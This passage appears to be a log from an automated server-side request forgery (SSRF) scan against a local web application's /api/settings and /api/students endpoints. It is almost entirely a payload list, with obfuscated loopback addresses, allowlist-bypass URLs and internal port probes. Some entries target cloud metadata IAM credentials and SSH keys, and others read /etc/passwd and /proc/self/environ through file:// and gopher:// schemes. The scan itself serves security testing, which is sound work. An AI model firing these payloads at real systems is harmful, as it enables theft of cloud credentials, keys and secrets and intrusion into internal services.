Testing: `http://localhost:4200/api/settings?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/settings?url=2130706433%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235521%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235777%2F` +- Testing: `http://localhost:4200/api/settings?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/settings?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/settings?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/settings?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/settings?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/settings?url=0%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.1` +- Testing: `http://localhost:4200/api/settings?url=localtest.me` +- Testing: `http://localhost:4200/api/settings?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/settings?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/settings?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/settings?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/settings?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/settings?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.1.3` +- Testing: `http://localhost:4200/api/settings?url=0` +- Testing: `http://localhost:4200/api/settings?url=127.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.1` +- Testing: `http://localhost:4200/api/settings?url=localhost` +- Testing: `http://localhost:4200/api/settings?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/settings?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/settings?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/settings?url=7F000001` +- Testing: `http://localhost:4200/api/settings?url=2130706433` +- Testing: `http://localhost:4200/api/settings?url=6425673729` +- Testing: `http://localhost:4200/api/settings?url=127001` +- Testing: `http://localhost:4200/api/settings?url=127_0._0_1` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/settings?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/settings?url=localtest.me` +- Testing: `http://localhost:4200/api/settings?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/settings?url=127.127.127.127` +- Testing: `http://localhost:4200/api/settings?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/settings?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001` +- Testing: `http://localhost:4200/api/settings?url=017700000001` +- Testing: `http://localhost:4200/api/settings?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/settings?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/settings?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/settings?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/settings?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/settings?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254` +- Testing: `http://localhost:4200/api/settings?url=2852039166` +- Testing: `http://localhost:4200/api/settings?url=7147006462` +- Testing: `http://localhost:4200/api/settings?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/settings?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/settings?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/settings?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/settings?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/settings?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/settings?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/settings?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/settings?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/settings?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/settings?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/settings?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/settings?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/settings?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/settings?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.0` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235521` +- Testing: `http://localhost:4200/api/settings?url=3232235777` +- Testing: `http://localhost:4200/api/settings?url=425.510.425.510` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/settings?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/settings?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/settings?url=instance-data` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A22` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A443` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A80` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/settings?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/settings?url=loopback` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A22` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A80` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A443` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/settings?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/settings?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/settings?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/settings?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/settings?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/settings?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/settings?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/settings?url=127.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/settings?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/settings?url=2130706433%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235521%2F` +- Testing: `http://localhost:4200/api/settings?url=3232235777%2F` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/settings?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/settings?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/settings?url=0%2F` +- Testing: `http://localhost:4200/api/settings?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/students +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/students?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/students?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/students?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/students?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/students?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/students?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/students?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/students?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/students?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/students?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/students?url=127.1%3A80` +- Testing: `http://localhost:4200/api/students?url=0` +- Testing: `http://localhost:4200/api/students?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/students?url=localhost%3A80` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/students?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/students?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/students?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/students?url=127.127.127.127` +- Testing: `http://localhost:4200/api/students?url=127.0.1.3` +- Testing: `http://localhost:4200/api/students?url=127.0.0.0` +- Testing: `http://localhost:4200/api/students?url=2130706433` +- Testing: `http://localhost:4200/api/students?url=017700000001` +- Testing: `http://localhost:4200/api/students?url=0x7f000001` +- Testing: `http://localhost:4200/api/students?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/students?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/students?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/students?url=google.com.localhost` +- Testing: `http://localhost:4200/api/students?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=` +- Testing: `http://localhost:4200/api/students?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/students?url=localtest.me` +- Testing: `http://localhost:4200/api/students?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/students?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/students?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/students?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/students?url=2130706433%2F` +- Testing: `http://localhost:4200/api/students?url=3232235521%2F` +- Testing: `http://localhost:4200/api/students?url=3232235777%2F` +- Testing: `http://localhost:4200/api/students?url=0177.0000.0000.0001` +- 